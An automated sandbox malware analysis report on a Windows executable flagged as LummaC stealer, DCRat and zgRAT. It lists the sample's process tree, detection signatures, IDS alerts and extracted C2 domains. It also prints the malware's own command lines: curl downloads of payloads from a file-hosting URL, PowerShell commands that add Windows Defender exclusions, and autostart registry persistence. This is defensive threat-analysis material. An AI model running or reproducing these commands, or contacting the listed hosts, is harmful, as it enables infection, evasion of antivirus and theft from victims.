Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NCTSgL4t0B.exe

Overview

General Information

Sample name:NCTSgL4t0B.exe
renamed because original name is a hash value
Original sample name:6129fb697b8d4658283864689c040b2cd65923233de7dc75f723e22b6eebc82e.exe
Analysis ID:1522836
MD5:76b682b895587819cc3293cc109d3eb1
SHA1:80e12ef0083ea82fcd3976e520c8f5bee908b830
SHA256:6129fb697b8d4658283864689c040b2cd65923233de7dc75f723e22b6eebc82e
Tags:exezelensky-topuser-JAMESWT_MHT
Infos:

Detection

LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious execution chain found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to resolve many domain names, but no domain seems valid
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Electron Application Child Processes
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • NCTSgL4t0B.exe (PID: 3804 cmdline: "C:\Users\user\Desktop\NCTSgL4t0B.exe" MD5: 76B682B895587819CC3293CC109D3EB1)
    • conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3812 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 3492 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • kdmapper.exe (PID: 1452 cmdline: "C:\Windows\Speech\kdmapper.exe" MD5: C85ABE0E8C3C4D4C5044AEF6422B8218)
      • wscript.exe (PID: 7192 cmdline: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 7532 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • msedge.exe (PID: 7576 cmdline: "C:\Edge/msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
            • csc.exe (PID: 7720 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 7772 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBBC9.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • csc.exe (PID: 7788 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 7844 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBDCC.tmp" "c:\Windows\System32\CSC75DA780D41F148BEB3E8CF69CEFFE.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • powershell.exe (PID: 7932 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • WmiPrvSE.exe (PID: 4544 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
            • powershell.exe (PID: 7944 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 8148 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TkseHYIaPv.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 2916 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • w32tm.exe (PID: 6532 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
              • msedge.exe (PID: 1056 cmdline: "C:\Edge\msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
                • cmd.exe (PID: 1568 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\CmSUPSwWTx.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 2864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • chcp.com (PID: 2384 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                  • w32tm.exe (PID: 3048 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                • Conhost.exe (PID: 6288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4872 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 2172 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • physmeme.exe (PID: 7252 cmdline: "C:\Windows\Speech\physmeme.exe" MD5: D6EDF37D68DA356237AE14270B3C7A1A)
      • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 7312 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • Idle.exe (PID: 8044 cmdline: C:\Users\user\AppData\Local\Idle.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)
  • Idle.exe (PID: 8056 cmdline: C:\Users\user\AppData\Local\Idle.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)
  • msedge.exe (PID: 8064 cmdline: C:\Edge\msedge.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)
  • msedge.exe (PID: 8096 cmdline: C:\Edge\msedge.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)
  • Idle.exe (PID: 1964 cmdline: "C:\Users\user\AppData\Local\Idle.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
    • cmd.exe (PID: 2236 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AntDRUzUoe.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 2860 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"C2 url": ["tendencerangej.shop", "surveriysiop.shop", "captainynfanw.shop", "coursedonnyre.shop", "tearrybyiwo.shop", "appleboltelwk.shop", "fossillargeiw.shop", "strappystyio.shop", "tiddymarktwo.shop"], "Build id": "1AsNN2--5899070203"}
SourceRuleDescriptionAuthorStrings
C:\Edge\msedge.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    C:\Edge\msedge.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      C:\Users\user\AppData\Local\Idle.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Users\user\AppData\Local\Idle.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Windows\Speech\kdmapper.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            00000017.00000000.1467994457.0000000000162000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0000000C.00000003.1308955813.0000000006617000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                00000017.00000002.1537440310.00000000126C9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  0000000C.00000003.1309568242.0000000006614000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    Process Memory Space: msedge.exe PID: 7576JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Click to see the 1 entries
                      SourceRuleDescriptionAuthorStrings
                      23.0.msedge.exe.160000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        23.0.msedge.exe.160000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          12.3.kdmapper.exe.66656cf.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            12.3.kdmapper.exe.66656cf.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              12.3.kdmapper.exe.66626cf.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                Click to see the 5 entries

                                System Summary

                                barindex
                                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 7788, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 7576, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe', ProcessId: 7932, ProcessName: powershell.exe
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\Idle.exe", EventID: 13, EventType: SetValue, Image: C:\Edge\msedge.exe, ProcessId: 7576, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\user\AppData\Local\Idle.exe", EventID: 13, EventType: SetValue, Image: C:\Edge\msedge.exe, ProcessId: 7576, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 7576, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline", ProcessId: 7720, ProcessName: csc.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 7576, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe', ProcessId: 7932, ProcessName: powershell.exe
                                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 7576, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe', ProcessId: 7932, ProcessName: powershell.exe
                                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, CommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\NCTSgL4t0B.exe", ParentImage: C:\Users\user\Desktop\NCTSgL4t0B.exe, ParentProcessId: 3804, ParentProcessName: NCTSgL4t0B.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, ProcessId: 3812, ProcessName: cmd.exe
                                Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBBC9.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBBC9.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 7720, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBBC9.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP", ProcessId: 7772, ProcessName: cvtres.exe
                                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Speech\kdmapper.exe" , ParentImage: C:\Windows\Speech\kdmapper.exe, ParentProcessId: 1452, ParentProcessName: kdmapper.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , ProcessId: 7192, ProcessName: wscript.exe
                                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Edge\msedge.exe, ProcessId: 7576, TargetFilename: C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 7576, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe', ProcessId: 7932, ProcessName: powershell.exe

                                Data Obfuscation

                                barindex
                                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 7576, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline", ProcessId: 7720, ProcessName: csc.exe
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:33:37.618210+020020546531A Network Trojan was detected192.168.2.749706172.67.197.40443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:33:37.618210+020020498361A Network Trojan was detected192.168.2.749706172.67.197.40443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:33:35.268714+020020560361Domain Observed Used for C2 Detected192.168.2.7654401.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:33:35.239060+020020560401Domain Observed Used for C2 Detected192.168.2.7607591.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:33:35.312038+020020560421Domain Observed Used for C2 Detected192.168.2.7496941.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:33:35.295906+020020560461Domain Observed Used for C2 Detected192.168.2.7588501.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:33:35.325816+020020560521Domain Observed Used for C2 Detected192.168.2.7519561.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:33:35.223222+020020560541Domain Observed Used for C2 Detected192.168.2.7504031.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:33:35.254192+020020560561Domain Observed Used for C2 Detected192.168.2.7546361.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:33:35.282658+020020560581Domain Observed Used for C2 Detected192.168.2.7640241.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:33:35.150866+020020561721Domain Observed Used for C2 Detected192.168.2.7517201.1.1.153UDP

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: NCTSgL4t0B.exeAvira: detected
                                Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
                                Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
                                Source: https://steamcommunity.com/profiles/76561199724331900/badgesURL Reputation: Label: malware
                                Source: C:\Users\user\AppData\Local\Temp\ndC0udATSD.batAvira: detection malicious, Label: BAT/Delbat.C
                                Source: C:\Users\user\AppData\Local\Idle.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                Source: C:\Users\user\AppData\Local\Temp\AntDRUzUoe.batAvira: detection malicious, Label: BAT/Delbat.C
                                Source: C:\Edge\L6lFlVnd0szYUYb26bZc.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                Source: C:\Edge\msedge.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                Source: C:\Users\user\AppData\Local\Temp\CmSUPSwWTx.batAvira: detection malicious, Label: BAT/Delbat.C
                                Source: C:\Users\user\Desktop\CQuHWLcS.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                Source: C:\Users\user\AppData\Local\Temp\TkseHYIaPv.batAvira: detection malicious, Label: BAT/Delbat.C
                                Source: C:\Users\user\Desktop\LAdenXtG.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                Source: 19.2.RegAsm.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["tendencerangej.shop", "surveriysiop.shop", "captainynfanw.shop", "coursedonnyre.shop", "tearrybyiwo.shop", "appleboltelwk.shop", "fossillargeiw.shop", "strappystyio.shop", "tiddymarktwo.shop"], "Build id": "1AsNN2--5899070203"}
